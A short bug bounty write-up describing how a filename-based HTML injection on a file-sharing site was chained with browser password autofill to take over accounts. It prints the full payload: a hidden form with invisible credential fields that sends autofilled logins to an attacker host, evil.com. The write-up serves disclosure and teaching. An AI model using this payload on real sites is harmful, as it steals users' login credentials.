Exploiting Auto-save Functionality To Steal Login Credentials

Hi Folks! hope you all doing well it’s being a long time since I do a write-up, so this write-up is all about my tweet Exploiting/Chaining auto-save functionality to takeover the victim account. Make sure to follow @xSaadAhmed and @SecurityFoster for more upcoming amazing write-ups & tools.

Exploiting/Chaining auto-save functionality to takeover victim account.

So without wasting a time let get started, It was a private program to let assume private.com. While exploring the website every input in properly sanitizing then file upload functionality caught my attention. So we can upload files & there is a public link that we can share & other people can also see my uploaded file. I tried to bypass the upload check to execute SVG, HTML, PHP but no luck, and then I rename my file to <h1>xd.jpg & visit my file through a public link & there is an HTML injection due to the filename. We got HTML injection here the next part is auto-saved functionality.

Basically when we saved the login credential in our browser & tried to login into the account the browser automatically fills the email & pass we just need to click on login. so I created a login form and make the email & password field invisible by setting opcaity:0 in CSS and my final filename is.

“><form action=”//evil.com” method=”GET”><input type=”text” name=”u” style=’opacity:0;’><input type=”password” name=”p” style=’opacity:0;’><input type=”submit” name=”s” value=”submit”><! — .jpg

This is from where I can get the public link of my uploaded file.

This how a page looks like after visiting the public URL of my uploaded file.

When anyone clicks on to submit his account login credentials sent to attacker server.

So how this works well the input fields fill automatically due to auto-saved functionality style=”opacity: 0;” will hide the details show on the page. When submitting the form, the detail automatically sent to evil.com because in the from action & due to setting the METHOD=’GET’ the login credential will be sent with GET Request to evil.com which is attacker control domain the last <! — will comment out every HTML on the page. I hope you guys like it :D